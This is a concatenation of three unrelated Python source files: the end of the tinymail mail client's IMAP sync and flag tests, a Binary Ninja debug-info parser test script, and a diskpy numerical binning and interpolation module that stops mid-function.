        self.assertEqual(msg22.raw_headers, "Subject: blah")
    def test_message_removed(self):
        db = mock_db()
        account = _account_for_test(db=db)
        with mock_worker(fol1={6: None, 8: None}):
            account.perform_update()
        with mock_worker(fol1={6: None}):
            account.perform_update()
        account2 = _account_for_test(db=db)
        fol1 = account2.get_folder('fol1')
        self.assertEqual([m.uid for m in fol1.list_messages()], [6])
    def test_uidvalidity(self):
        db = mock_db()
        account = _account_for_test(db=db)
        with mock_worker(fol1={13: msg13_data, 'UIDVALIDITY': 1234}):
            account.perform_update()
        account2 = _account_for_test(db=db)
        fol1 = account2.get_folder('fol1')
        self.assertEqual(fol1._uidvalidity, 1234)
    def test_uidvalidity_changed(self):
        db = mock_db()
        account = _account_for_test(db=db)
        msg13_bis_data = (13, set([r'\Seen']), "Subject: another message")
        with mock_worker(fol1={13: msg13_data, 'UIDVALIDITY': 1234}):
            account.perform_update()
        with mock_worker(fol1={13: msg13_bis_data, 'UIDVALIDITY': 1239}):
            account.perform_update()
        account2 = _account_for_test(db=db)
        fol1 = account2.get_folder('fol1')
        self.assertEqual(fol1._uidvalidity, 1239)
        self.assertEqual([m.raw_headers for m in fol1.list_messages()],
                         [msg13_bis_data[2]])
    def test_message_flags_changed(self):
        db = mock_db()
        account = _account_for_test(db=db)
        msg13_bis_data = (13, set([r'\Flagged']), "Subject: test message")
        with mock_worker(fol1={13: msg13_data}):
            account.perform_update()
        with mock_worker(fol1={13: msg13_bis_data}):
            account.perform_update()
        account2 = _account_for_test(db=db)
        fol1 = account2.get_folder('fol1')
        self.assertEqual([m.flags for m in fol1.list_messages()],
                         [set(['\\Flagged'])])
class ModifyFlagsTest(unittest.TestCase):
    """Folder.change_flag: local state, persistence, emitted signals and
    the calls forwarded to the IMAP worker."""
    def setUp(self):
        # Seed the account with one folder of three messages.
        self.db = mock_db()
        self.account = _account_for_test(db=self.db)
        self.imap_data = {'fol1': {
            4: (4, set([r'\Seen']), "Subject: test message"),
            15: (15, set([r'\Flagged']), "Subject: whatever"),
            22: (22, set([r'\Seen', r'\Answered']), "Subject: blah"),
        }}
        with mock_worker(**self.imap_data):
            self.account.perform_update()
    def test_add_flag(self):
        from tinymail.account import folder_updated
        fol1 = self.account.get_folder('fol1')
        with mock_worker(**self.imap_data) as worker:
            with listen_for(folder_updated) as caught_signals:
                fol1.change_flag([4, 15], 'add', '\\Seen')
        event_data = {'added': [], 'removed': [], 'flags_changed': [4, 15]}
        self.assertEqual(caught_signals, [(fol1, event_data)])
        worker.change_flag.assert_called_once_with([4, 15], 'add', '\\Seen')
        self.assertEqual(fol1.get_message(4).flags, set(['\\Seen']))
        self.assertEqual(fol1.get_message(15).flags,
                         set(['\\Seen', '\\Flagged']))
        # The change must also be persisted: a fresh account on the same db
        # sees the updated flags.
        accountB = _account_for_test(db=self.db)
        fol1B = accountB.get_folder('fol1')
        self.assertEqual(fol1B.get_message(4).flags, set(['\\Seen']))
        self.assertEqual(fol1B.get_message(15).flags,
                         set(['\\Seen', '\\Flagged']))
    def test_del_flag(self):
        from tinymail.account import folder_updated
        fol1 = self.account.get_folder('fol1')
        with mock_worker(**self.imap_data) as worker:
            with listen_for(folder_updated) as caught_signals:
                fol1.change_flag([4, 15], 'del', '\\Seen')
        event_data = {'added': [], 'removed': [], 'flags_changed': [4, 15]}
        self.assertEqual(caught_signals, [(fol1, event_data)])
        worker.change_flag.assert_called_once_with([4, 15], 'del', '\\Seen')
        self.assertEqual(fol1.get_message(4).flags, set())
        self.assertEqual(fol1.get_message(15).flags, set(['\\Flagged']))
        accountB = _account_for_test(db=self.db)
        fol1B = accountB.get_folder('fol1')
        self.assertEqual(fol1B.get_message(4).flags, set())
        self.assertEqual(fol1B.get_message(15).flags, set(['\\Flagged']))
    def test_close_mailbox_after_changing_flags(self):
        account = _account_for_test()
        with mock_worker(fol1={13: msg13_data}) as worker:
            account.perform_update()
            worker.close_mailbox.reset_mock()
            account.get_folder('fol1').change_flag([13], 'add', '\\Flagged')
        worker.close_mailbox.assert_called_once_with()
class MessagesCopyTest(unittest.TestCase):
    """Folder.copy_messages: worker call, local/persisted state and the
    `folder_updated` signal on the destination folder."""
    def setUp(self):
        # Two folders, one message each.
        self.db = mock_db()
        self.account = _account_for_test(db=self.db)
        self.imap_data = {'fol1': {13: msg13_data}, 'fol2': {22: msg22_data}}
        with mock_worker(**self.imap_data):
            self.account.perform_update()
        self.fol1 = self.account.get_folder('fol1')
        self.fol2 = self.account.get_folder('fol2')
    def test_copy_one_message(self):
        with mock_worker(**self.imap_data) as worker:
            self.fol1.copy_messages([13], self.fol2)
        worker.copy_messages.assert_called_once_with([13], 'fol2')
    def test_local_data_after_copy(self):
        with mock_worker(**self.imap_data) as worker:
            self.fol1.copy_messages([13], self.fol2)
        fol2_msgs = list(self.fol2.list_messages())
        self.assertEqual(len(fol2_msgs), 2)
        # The copy gets a new (highest) uid but keeps flags and headers.
        uid = max(self.fol2._messages)
        msg = self.fol2.get_message(uid)
        self.assertEqual(msg.flags, msg13_data[1])
        self.assertEqual(msg.raw_headers, msg13_data[2])
        # And the copy is persisted for a fresh account on the same db.
        accountB = _account_for_test(db=self.db)
        fol2B = accountB.get_folder('fol2')
        self.assertEqual(len(list(fol2B.list_messages())), 2)
        msgB = fol2B.get_message(uid)
        self.assertEqual(msgB.flags, msg13_data[1])
        self.assertEqual(msgB.raw_headers, msg13_data[2])
    def test_copy_event(self):
        from tinymail.account import folder_updated
        with mock_worker(**self.imap_data) as worker:
            with listen_for(folder_updated) as caught_signals:
                self.fol1.copy_messages([13], self.fol2)
        uid = max(self.fol2._messages.keys())
        event_data = {'added': [uid], 'removed': [], 'flags_changed': []}
        self.assertEqual(caught_signals, [(self.fol2, event_data)])
|
import binaryninja as bn
import os
# Path to the test binary shipped next to this script.
filename = os.path.join(os.path.dirname(os.path.abspath(__file__)), "test_debug_info")
# When loaded as a Binary Ninja plugin (not run as a script), route `print`
# through the Binary Ninja log so output appears in the UI log window.
print = print
if __name__ != "__main__":
    print = bn.log_error
def pretty_print_add_data_variable(
    debug_info: bn.debuginfo.DebugInfo, address: int, t: bn.types.Type, name: str = None
) -> None:
    """Add a data variable to the debug info and log whether it succeeded."""
    result = debug_info.add_data_variable(address, t, name)
    print(f"  Adding data variable of type `{t}` at {hex(address)} : {result}")
def pretty_print_add_function(
    debug_info: bn.debuginfo.DebugInfo, address: int, short_name: str = None, full_name: str = None, raw_name: str = None,
    return_type=None, parameters=None
) -> None:
    """Add a function to the debug info and log whether it succeeded."""
    function_info = bn.debuginfo.DebugFunctionInfo(address, short_name, full_name, raw_name, return_type, parameters)
    # Build the printable signature first; the parameter list is empty when
    # no parameters were supplied.
    if parameters is not None:
        parameter_list = ', '.join(f'{t} {name}' for name, t in parameters)
    else:
        parameter_list = ''
    print(
        f"  Adding function `{return_type} {short_name}({parameter_list})` at {hex(address)} : {debug_info.add_function(function_info)}"
    )
def is_valid(bv: bn.binaryview.BinaryView):
    """Only accept the binary shipped with this test (identified by its
    `__elf_interp` contents)."""
    sym = bv.get_symbol_by_raw_name("__elf_interp")
    if sym is None:
        return False
    var = bv.get_data_var_at(sym.address)
    interp_bytes = bv.read(sym.address, var.type.width - 1)
    return interp_bytes == b"test_debug_info_parsing"
def parse_info(debug_info: bn.debuginfo.DebugInfo, bv: bn.binaryview.BinaryView):
    """Populate `debug_info` for the test binary: two struct types, four data
    variables (at fixed addresses in the test binary), and six functions with
    varying parameter usage."""
    print("Adding types")
    types = []
    for name, t in bv.parse_types_from_string(
        """
        struct test_type_1 {
            int a;
            char b[4];
            uint64_t c;
            bool d;
        };
        struct test_type_2 {
            struct test_type_1 a;
            struct test_type_1* b;
            struct test_type_2* c;
        };"""
    ).types.items():
        print(f"  Adding type \"{name}\" `{t}` : {debug_info.add_type(str(name), t)}")
        types.append(t)
    print("Adding data variables")
    # Addresses are fixed offsets into the `test_debug_info` test binary.
    pretty_print_add_data_variable(debug_info, 0x4030, types[0], "test_var_1")
    pretty_print_add_data_variable(debug_info, 0x4010, bn.types.Type.int(4, True), "test_var_2")
    # Names are optional
    pretty_print_add_data_variable(debug_info, 0x4014, bn.types.Type.int(4, True))
    t = bn.types.Type.int(4, True)
    t.const = True
    pretty_print_add_data_variable(debug_info, 0x2004, t, "test_var_3")
    print("Adding functions")
    char_star = bv.parse_type_string("char*")[0]
    pretty_print_add_function(debug_info, 0x1129, "no_return_type_no_parameters", None, None, bn.types.Type.void(), None)
    pretty_print_add_function(
        debug_info, 0x1134, "used_parameter", None, None, bn.types.Type.bool(), [("value", bn.types.Type.bool())]
    )
    pretty_print_add_function(
        debug_info, 0x1155, "unused_parameters", None, None, bn.types.Type.int(4, True),
        [("value_1", bn.types.Type.bool()), ("value_2", bn.types.Type.int(4, True)), ("value_3", char_star)]
    )
    pretty_print_add_function(
        debug_info, 0x1170, "used_and_unused_parameters_1", None, None, bn.types.Type.int(4, True),
        [("value_1", bn.types.Type.int(4, True)), ("value_2", bn.types.Type.int(4, True)), ("value_3", char_star),
         ("value_4", bn.types.Type.bool())]
    )
    pretty_print_add_function(
        debug_info, 0x1191, "used_and_unused_parameters_2", None, None, bn.types.Type.int(1, False),
        [("value_1", bn.types.Type.bool()), ("value_2", bn.types.Type.int(1, False)), ("value_3", char_star),
         ("value_4", bn.types.Type.int(1, False)), ("value_5", bn.types.Type.char())]
    )
    pretty_print_add_function(
        debug_info, 0x11c0, "local_parameters", None, None, bn.types.Type.void(), [("value_1", bn.types.Type.bool()),
                                                                                   ("value_2", bn.types.Type.int(1, False)),
                                                                                   ("value_3", char_star),
                                                                                   ("value_4", bn.types.Type.int(1, False)),
                                                                                   ("value_5", bn.types.Type.char())]
    )
# Register the real parser plus two dummies so the parser registry can be
# exercised (enumeration, lookup by name, validity filtering).
parser = bn.debuginfo.DebugInfoParser.register("test debug info parser", is_valid, parse_info)
print(f"Registered parser: {parser.name}")
bn.debuginfo.DebugInfoParser.register("dummy extra debug parser 1", lambda bv: False, lambda di, bv: None)
bn.debuginfo.DebugInfoParser.register(
	"dummy extra debug parser 2", lambda bv: bv.view_type != "Raw", lambda di, bv: None
)
# BUGFIX: corrected typo in user-facing message ("Availible" -> "Available")
print(f"Available parsers: {len(list(bn.debuginfo.DebugInfoParser))}")
for p in bn.debuginfo.DebugInfoParser:
	if p == parser:
		print(f"  {bn.debuginfo.DebugInfoParser[p.name].name} (the one we just registered)")
	else:
		print(f"  {bn.debuginfo.DebugInfoParser[p.name].name}")
# Open the test binary with automatic debug-info parsing disabled so only
# our explicit parse below runs.
bv = bn.open_view(filename, options={"analysis.experimental.parseDebugInfo": False})
if parser.is_valid_for_view(bv):
	print("Parser is valid")
else:
	print("Parser is NOT valid!")
	quit()
print("")
for p in bn.debuginfo.DebugInfoParser.get_parsers_for_view(bv):
	print(f"`{p.name}` is valid for `{bv}`")
print("")
debug_info = parser.parse_debug_info(bv)
print("\nEach of the following pairs of prints should be the same\n")
print("All types:")
for name, t in debug_info.types:
	print(f"  \"{name}\": `{t}`")
print("Types from parser:")
for name, t in debug_info.types_from_parser(parser.name):
	print(f"  \"{name}\": `{t}`")
print("")
print("All functions:")
for func in debug_info.functions:
	print(f"  {func}")
print("Functions from parser:")
for func in debug_info.functions_from_parser(parser.name):
	print(f"  {func}")
print("")
print("All data variables:")
for data_var in debug_info.data_variables:
	print(f"  {data_var}")
print("Data variables from parser:")
for data_var in debug_info.data_variables_from_parser(parser.name):
	print(f"  {data_var}")
# BUGFIX: corrected typo in user-facing message ("Appling" -> "Applying")
print("Applying debug info!")
bv.apply_debug_info(debug_info)
bv.update_analysis_and_wait()
print("")
print("Types:")
for name, t in debug_info.types:
	print(f"  {bv.get_type_by_name(name)}")
print("")
print("Functions:")
for func in debug_info.functions:
	print(f"  {bv.get_function_at(func.address)}")
print("")
print("Data variables:")
for data_var in debug_info.data_variables:
	print(f"  {bv.get_data_var_at(data_var.address)}")
|
"""
Created on Thu Jul 16 14:26:07 2015
@author: ibackus
"""
import os
import numpy as np
import scipy.interpolate as interp
interp1d = interp.interp1d
import pynbody as pb
SimArray = pb.array.SimArray
from diskpy.utils import strip_units, match_units
def _loadcoeffs(fname):
"""
Loads hermite polynomial coefficients stored in fname and returns them
as a dictionary, where the keys are the degree of the polynomial and the
values are the coefficients
"""
# Load up the hermite spline (polynomial) coefficients
f =open(fname,'r')
coeffs_list = []
order_list = []
for line in f:
l = line.strip().split(',')
order_list.append(int(l[0]))
for n in range(len(l)):
l[n] = float(l[n].strip())
coeffs_list.append(np.array(l[1:],dtype='float'))
order = np.array(order_list)
coeffs = {}
for i in range(len(order)):
coeffs[order[i]] = coeffs_list[i]
return coeffs
# The coefficient table ships alongside this module; load it once at import
# time so smoothstep() can look polynomials up by degree.
_dir = os.path.dirname(os.path.realpath(__file__))
_coeffsfile = os.path.join(_dir, 'hermite_spline_coeffs.dat')
hermite_coeffs = _loadcoeffs(_coeffsfile)
def dA(redges, thetaedges):
    """
    Calculates the area of bins in cylindrical coordinates as
    .. math:: dA = r(\\Delta r) (\\Delta \\theta)
    on a grid of r, theta values

    Parameters
    ----------
    redges, thetaedges : array like
        1D arrays of the binedges in r, theta.

    Returns
    -------
    dA : array
        2D array of dA values over r, theta. dA[i,j] corresponds to r[i]
        theta[j]
    """
    # Bin widths along each axis
    width_r = redges[1:] - redges[0:-1]
    width_theta = thetaedges[1:] - thetaedges[0:-1]
    # Mid-point radius of every radial bin
    r_mid = (redges[1:] + redges[0:-1])/2.
    # Outer product: dA[i, j] = r_i * dr_i * dtheta_j
    return np.dot((r_mid * width_r)[:, None], width_theta[None, :])
def setupbins(x, bins=10):
    """
    Sets up bins for data x (similar to numpy.histogram). If bins is an
    integer, the min/max are set to include all data

    Parameters
    ----------
    x : arraylike
        Data to be binned
    bins : int or array-like
        Number of bins or binedges to use

    Returns
    -------
    binedges : array
        Bin edges
    """
    # If bins is not iterable, it is the number of bins
    if not hasattr(bins, '__iter__'):
        # BUGFIX: the original tested isinstance(x.dtype, int), which is never
        # true (numpy dtype objects are not ints), so integer-typed data fell
        # through to np.finfo and raised.  np.issubdtype does the right check.
        if np.issubdtype(x.dtype, np.integer):
            # Pad by half a count so the extreme values fall inside the bins
            xmin = x.min() - 0.5
            xmax = x.max() + 0.5
        else:
            # Widen the float range by a couple of ulps so x.max() is included
            eps = np.finfo(x.dtype).eps
            xmin = x.min() * (1 - 2*eps)
            xmax = x.max() * (1 + 2*eps)
        binedges = np.linspace(xmin, xmax, bins + 1)
    else:
        # Bins is already binedges. do nothing
        binedges = bins
    return binedges
def resolvedbins(x, y, minbins=200, ftol=None):
    """
    Generates a sub-view of x that allows y to be resolved up to ftol. Since
    f will only be sampled at x, x should be very (overly) high resolution.

    Parameters
    ----------
    x : array or SimArray
        initial bin positions to try. should be many more than required
    y : array or SimArray
        y(x), same shape as x. the function values to resolve
    minbins : int
        Minimum number of bins to return. IF the ftol is met but there are
        not enough bins, ftol is decreased
    ftol : SimArray, float
        Function tolerance. Maximum difference between the interpolated,
        subsampled y(x) and the fully resolved version

    Returns
    -------
    x2 : array or SimArray
        A subview of x that provides the required resolution
    """
    # Initialize
    if ftol is None:
        ftol = y.max() * 1e-5
    nx = len(x)
    # Begin with bin edges at both ends
    binind = [0, nx-1]
    maxiter = int(1e5)
    # Main refinement loop: bisect any bin whose linear-interp error is too
    # large; loosen ftol if convergence happens with too few bins.
    for _ in range(maxiter):
        # Linear spline interpolation through the currently selected points
        yspl = interp1d(x[binind], y[binind], kind='linear')
        # Difference between interpolated and actual values (on the grid)
        diff = abs(y - yspl(x))
        # Find if any new bins need to be made
        nbins = len(binind) - 1
        newbins = []
        # BUGFIX: the original reused loop variable `i` here, shadowing the
        # outer iteration counter; renamed for clarity (behavior unchanged).
        for ibin in range(nbins):
            # Get the indices of the current bin's edges
            iLo = binind[ibin]
            iHi = binind[ibin+1]
            # If they are separated by more than one, we may need another bin
            if (iHi-iLo) > 1:
                # Find maximum error in the bin
                err = diff[iLo+1:iHi].max()
                # If the error exceeds the tolerance, bisect the bin
                if err > ftol:
                    newbins.append(int((iLo + iHi)/2))
        if len(newbins) == 0:
            # Converged - check if we have enough bins
            if nbins < minbins:
                # Decrease ftol to force further refinement
                ftol /= 1.5
            else:
                # we have enough bins, break
                break
        else:
            # There are new bins, keep going
            binind.extend(newbins)
            binind.sort()
    binind = np.array(binind)
    return x[binind]
def bin2dsum(x, y, z, xbins=10, ybins=10):
    """
    Bins x,y using bin2d and sums z in those bins

    Parameters
    ----------
    x, y, z: array-like
        x, y, and z values. Bins are in x-y, z values are summed
    xbins, ybins: int or array-like
        (see bin2d) Number of bins or bin edges

    Returns
    -------
    zbinned : array-like
        2D array of z-values, summed in the bins. zbinned[i,j] gives the value
        of z summed in xbin[i], ybin[j]
    xedges, yedges : array
        1D arrays of binedges in x,y
    """
    (xind, yind), xedges, yedges = bin2d(x, y, xbins, ybins)
    # Fast path: when every z is identical (e.g. equal-mass particles) the
    # per-bin sum is just (count in bin) * z, which avoids the double loop.
    if np.all(z == z[0]):
        counts = np.histogram2d(x, y, [xedges, yedges])[0]
        zbinned = z[[0]] * counts
    else:
        # General case: explicit sum of z over each (x, y) bin
        nx = len(xedges) - 1
        ny = len(yedges) - 1
        zbinned = np.zeros([nx, ny])
        if pb.units.has_units(z):
            # Preserve units on the output when z carries them
            zbinned = SimArray(zbinned, z.units)
        for ix in range(nx):
            in_xbin = (xind == ix)
            for iy in range(ny):
                zbinned[ix, iy] = z[in_xbin & (yind == iy)].sum()
    return zbinned, xedges, yedges
def bin2d(x, y, xbins=10, ybins=10):
    """
    2-dimensional binning of x, y

    Works as a 2-D extension of numpy.digitize but also automatically sets-up
    binedges

    Parameters
    ----------
    x, y : array-like
        x, y values to bin according to
    xbins, ybins : int OR list/array like
        Either the number of bins or the binedges to use

    Returns
    -------
    ind : list of arrays
        The x,y bin indices each entry belongs to. ind[0][i] gives the x-bin
        of the ith entry. ind[1][i] gives the y-bin of the ith entry
    xedges, yedges: arrays
        Bin edges used
    """
    xedges = setupbins(x, xbins)
    yedges = setupbins(y, ybins)
    # np.digitize is 1-based; shift both axes to 0-based bin indices
    ind = [np.digitize(x, xedges) - 1, np.digitize(y, yedges) - 1]
    return ind, xedges, yedges
def extrap1d(x, y):
    """
    Calculates a linear interpolation of x and y and does a linear
    extrapolation for points outside of x and y.
    Uses scipy.interpolate.interp1d
    """
    # Drop any NaN entries before fitting
    keep = (~np.isnan(x)) & (~np.isnan(y))
    x = x[keep]
    y = y[keep]
    # Linear spline over the valid data range
    yspline = interp.interp1d(x, y, kind='linear')
    def fcn(x0):
        """Evaluate the interpolant at x0, extrapolating linearly outside."""
        if hasattr(x0, '__iter__'):
            below = x0 < x.min()
            above = x0 > x.max()
            inside = (~below) & (~above)
            out = np.zeros(len(x0))
            # Extrapolate using the slope of the first/last segment
            out[below] = y[0] + (x0[below] - x[0])*(y[1]-y[0])/(x[1]-x[0])
            out[above] = y[-1] + (x0[above] - x[-1])*(y[-1] - y[-2])/(x[-1] - x[-2])
            out[inside] = yspline(x0[inside])
            return out
        # Scalar input: pick the matching branch, then coerce to plain float
        if x0 < x.min():
            result = y[0] + (x0 - x[0])*(y[1]-y[0])/(x[1]-x[0])
        elif x0 > x.max():
            result = y[-1] + (x0 - x[-1])*(y[-1] - y[-2])/(x[-1] - x[-2])
        else:
            result = yspline(x0)
        # Don't return an array with one element
        return float(result)
    return fcn
def meshinterp(xedges, y, z, kind='linear', bounds_error=False, fill_value=0,
    assume_sorted=True):
    """
    Generates a 2D interpolating function for z defined on a non-uniform mesh
    Handles units

    Parameters
    ----------
    xedges : array
        1D array defining the x bin edges, monotonically increasing
    y : array
        2D array defining y values. shape (nx, ny), where nx is the number
        of xedges and ny is the number of y-points at each x-bin
        So, y[i, :] are the monotonically increasing y values at xedges[i]
    z : array
        2D array of z(x,y). shape (nx, ny) = y.shape
    kind : str
        (optional) Sets the kind of interpolation to perform
        [see scipy.interpolate.interp1d]
    bounds_error : bool
        (optional) Flag to raise error if values outside of y are called
        [see scipy.interpolate.interp1d]
    fill_value : float
        (optional) Sets the value to fill with if bounds_error = True
        [see scipy.interpolate.interp1d]
    assume_sorted : bool
        [see scipy.interpolate.interp1d]

    Returns
    -------
    meshspline(x, y): callable interpolation function
        Function which can be called on x, y pairs to give the interpolated
        value of z. Values outside of the range of y are set to fill_value.
        x values outside the range of xedges are set to the boundary of xedges

    Raises
    ------
    ValueError
        If y and z shapes differ, or xedges and y lengths differ
    """
    # Check shapes
    # BUGFIX: replaced Python-2-only `raise E, msg` statements with the call
    # form, which is valid in both Python 2 and 3.
    if z.shape != y.shape:
        raise ValueError('y and z must have same shape')
    if len(xedges) != len(y):
        raise ValueError('x and y must have same len')
    # Handle units: remember each input's units (or None) and work unitless
    pos = [xedges, y, z]
    units = []
    for a in pos:
        if pb.units.has_units(a):
            units.append(a.units)
        else:
            units.append(None)
    xedges, y, z = strip_units(pos)
    # Setup bin information
    binsize = xedges[1:] - xedges[0:-1]
    xmin = xedges[0]
    xmax = xedges[-1]
    nbins = len(xedges) - 1
    # Build one 1D spline z(y) per x-edge; the 2D value is later a weighted
    # average of the splines at the two edges bracketing each x
    splines = []
    for i in range(nbins+1):
        # perform interpolation to make spline
        splines.append(interp1d(y[i], z[i], kind=kind, \
        bounds_error=bounds_error, fill_value=fill_value, \
        assume_sorted=assume_sorted))
    # Define the callable interplation function to return
    def meshspline(x1, y1):
        """
        Callable interpolation function, interoplates the value of z at
        points (x1, y1)

        Parameters
        ----------
        x1, y1 : array
            x and y points to evaluate z at.  Must be the same shape. ie,
            x1[i], y1[i] define a point (x, y).
            If @x1 or @y1 have no units, they are assumed to have the units of
            the nodes used to make the interpolator.  Otherwise they are
            converted to the proper units

        Returns
        -------
        z(x1, y1) : array
            z evaluated at @x1, @y1
        """
        # Handle units: convert inputs to the node units, then strip
        x1 = strip_units(match_units(x1, units[0])[0])
        y1 = strip_units(match_units(y1, units[1])[0])
        # Setup x and y points to estimate z at (promote scalars to 1D)
        x1 = np.asarray(x1).copy()
        y1 = np.asarray(y1)
        if len(x1.shape) < 1:
            x1 = x1[None]
        if len(y1.shape) < 1:
            y1 = y1[None]
        # Flatten arrays; the original shape is restored before returning
        shape = x1.shape
        nElements = np.prod(shape)
        x1 = np.reshape(x1, [nElements])
        y1 = np.reshape(y1, [nElements])
        # Clamp xs outside the boundaries onto the boundary
        x1[x1 < xmin] = xmin
        x1[x1 > xmax] = xmax
        # Find bin indices
        ind = np.digitize(x1, xedges) - 1
        ind[ind < 0] = 0
        ind[ind > nbins - 1] = nbins - 1
        # Get bin info for every point
        xlo = xedges[ind]
        xhi = xedges[ind + 1]
        dx = binsize[ind]
        # Get weights for bins (distance from bin edges)
        wlo = (xhi - x1)/dx
        whi = (x1 - xlo)/dx
        # Get function values at left and right xedges
        flo = np.zeros(x1.shape)
        fhi = np.zeros(x1.shape)
        for i in range(nbins):
            # Select everything in bin i
            mask = (ind == i)
            if np.any(mask):
                # Retrieve function values
                flo[mask] = splines[i](y1[mask])
                fhi[mask] = splines[i+1](y1[mask])
        # Take a weighted average of the function values at left and right
        # bin edges
        fout = wlo*flo + whi*fhi
        # Unflatten fout:
        fout = np.reshape(fout, shape)
        return SimArray(fout, units[2])
    return meshspline
def smoothstep(x,degree=5,rescale=False):
    """
    Calculates a smooth step function y(x) evaluated at the data points x.
    x should be a numpy array or float.

    y(x) is a polynomial of order 'degree' (default is 5). degree must be an
    odd number between 3 and 25 (inclusive). The higher the order, the
    sharper the step is.

    y(x) is defined by:
        y(0) = 0
        y(1) = 1
        The first (degree - 1)/2 derivatives are 0 at y = 0,1

    *** ARGUMENTS ***
    * x * Points at which to evaluate the smoothstep
    * degree * Degree of the smooth step. Must be odd number between 3 and 25
        default = 5
    * rescale * Rescale x to be between 0 and 1. Default = False. If True,
        x MUST be an array (greater than length 1)

    *** RETURNS ***
    y(x): float or array, 0 below the step, 1 above it, polynomial inside
    """
    # Look up coefficients for this degree (KeyError for unsupported degrees)
    coeffs = hermite_coeffs[degree]
    n_coeffs = len(coeffs)
    if rescale:
        # BUGFIX: narrowed the bare `except:` (which also swallowed
        # KeyboardInterrupt) and replaced the Python-2-only raise syntax.
        try:
            x = (x - x.min())/(x.max() - x.min())
        except Exception:
            raise RuntimeError('Could not rescale x. Make sure x is an array')
    # COMPAT: Python 2 has a separate `long` type; on Python 3 referencing it
    # raises NameError, so build the scalar-type tuple defensively.
    try:
        scalar_types = (int, long, float, complex)
    except NameError:
        scalar_types = (int, float, complex)
    if isinstance(x, scalar_types):
        # x is a number, handle accordingly
        y = 0.0
        if (x > 0) & (x < 1):
            # If 0<x<1, calculate the smooth step
            for n in range(n_coeffs):
                y += coeffs[n] * x**(degree - n)
        elif x <= 0:
            y = 0.0
        else:
            y = 1.0
    else:
        # Assume x is a numpy array: evaluate the polynomial only strictly
        # inside (0, 1); clamp to 0/1 outside
        y = np.zeros(x.shape)
        ind = (x > 0) & (x < 1)
        for n in range(n_coeffs):
            y[ind] += coeffs[n] * x[ind]**(degree-n)
        y[x >= 1] = 1
    return y
def digitize_threshold(x, min_per_bin = 0, bins=10):
    """
    Digitizes x according to bins, similar to numpy.digitize, but requires
    that there are at least min_per_bin entries in each bin.  Bins that do not
    have enough entries are combined with adjacent bins until they meet the
    requirement.

    **ARGUMENTS**

    x : array_like
        Input array to be binned.  Must be 1-dimensional
    min_per_bin : int
        Minimum number of entries per bin.  Default = 0
    bins : int or sequence of scalars, optional
        [same as for np.histogram]
        If bins is an int, it defines the number of equal-width bins in the
        given range (10, by default). If bins is a sequence, it defines the
        bin edges, including the rightmost edge, allowing for non-uniform bin
        widths.

    **RETURNS**

    A tuple containing:
    ind : array_like
        Indices of the bin each element of x falls into, such that:
        bin_edges[i] <= x[i] < bin_edges[i+1]
        (See np.digitize, this uses the same convention)
    bin_edges: array_like
        The edges of the bins

    **RAISES**

    RuntimeError
        If the total count is below min_per_bin
    """
    # Find number in each bin
    N, bin_edges = np.histogram(x, bins)
    # BUGFIX: replaced Python-2-only `raise E, msg` with the call form
    if N.sum() < min_per_bin:
        raise RuntimeError('Not enough particles within the bin range')
    n_bins = len(bin_edges) - 1
    # Forward pass: merge an under-filled bin into its right neighbour by
    # dropping the shared (right) edge
    edge_mask = np.ones(len(bin_edges), dtype='bool')
    for i in range(n_bins - 1):
        # Work forwards
        if N[i] < min_per_bin:
            # Set mask to not use the right bin edge
            edge_mask[i+1] = False
            # Combine the particles in current and next bin
            N[i] += N[i+1]
            N[i+1] = N[i]
    bin_mask = edge_mask[1:]
    N = N[bin_mask]
    bin_edges = bin_edges[edge_mask]
    # Backward pass: merge remaining under-filled bins leftwards
    edge_mask = np.ones(len(bin_edges), dtype='bool')
    n_bins = len(bin_edges) - 1
    for i in range(n_bins-1, 0, -1):
        # Work backwards
        if N[i] < min_per_bin:
            # Set mask to not use the left bin edge
            edge_mask[i] = False
            # Combine the particles in current and next bin
            N[i] += N[i-1]
            N[i-1] = N[i]
    bin_edges = bin_edges[edge_mask]
    ind = np.digitize(x, bin_edges)
    return ind, bin_edges
def binned_mean(x, y, bins=10, nbins=None, binedges = None, weights=None,\
weighted_bins=False, ret_bin_edges=False):
    """
    Bins y according to x and takes the average for each bin.

    bins can either be an integer (the number of bins to use) or an array of
    binedges.  bins will be overridden by nbins or binedges

    Optionally (for compatibility reasons) if binedges is specified, the
    x-bins are defined by binedges.  Otherwise the x-bins are determined by
    nbins

    If weights = None, equal weights are assumed for the average, otherwise
    weights for each data point should be specified

    y_err (error in y) is calculated as the standard deviation in y for each
    bin, divided by sqrt(N), where N is the number of counts in each bin

    IF weighted_bins is True, the bin centers are calculated as a center of
    mass

    NaNs are ignored for the input.  Empty bins are returned with nans

    RETURNS a tuple of (bin_centers, y_mean, y_err) if ret_bin_edges=False
    else, Returns (bin_edges, y_mean, y_err)
    """
    # Normalize the three ways of specifying bins into nbins/binedges
    if (isinstance(bins, int)) and (nbins is None):
        nbins = bins
    elif (hasattr(bins, '__iter__')) and (binedges is None):
        binedges = bins
    if binedges is not None:
        nbins = len(binedges) - 1
    else:
        # Widen the top edge slightly so x.max() falls inside the last bin
        binedges = np.linspace(x.min(), (1 + np.spacing(2))*x.max(), nbins + 1)
    if weights is None:
        weights = np.ones(x.shape)
    weights = strip_units(weights)
    # Pre-factor for weighted STD:
    # NOTE(review): this A is recomputed per-bin inside the loop below, so
    # this assignment is effectively dead.
    A = 1/(1 - (weights**2).sum())
    # Initialize
    y_mean = np.zeros(nbins)
    y_std = np.zeros(nbins)
    # Find the index bins for each data point
    ind = np.digitize(x, binedges) - 1
    # Ignore nans
    nan_ind = np.isnan(y)
    N = np.histogram(x, binedges)[0]
    # Initialize bin_centers (try to retain units)
    bin_centers = 0.0*binedges[1:]
    for i in range(nbins):
        #Indices to use
        mask = (ind==i) & (~nan_ind)
        # Set up the weighting: normalize weights within the bin
        w = weights[mask].copy()
        w /= w.sum()
        # Unbiasing pre-factor for the weighted variance
        A = 1/(1 - (w**2).sum())
        #y_mean[i] = np.nanmean(y[mask])
        y_mean[i] = (w * y[mask]).sum()
        var = A*(w*(y[mask] - y_mean[i])**2).sum()
        y_std[i] = np.sqrt(var)
        #y_std[i] = np.std(y[use_ind])
        if weighted_bins:
            # Center of mass of x positions
            bin_centers[i] = (w*x[mask]).sum()
    # Restore units on the outputs, then blank out empty bins with NaN
    y_mean = match_units(y_mean, y)[0]
    y_err = y_std/np.sqrt(N)
    y_err = match_units(y_err, y)[0]
    y_mean[N==0] = np.nan
    y_err[N==0] = np.nan
    if not weighted_bins:
        bin_centers = (binedges[0:-1] + binedges[1:])/2.0
        binedges = match_units(binedges, x)[0]
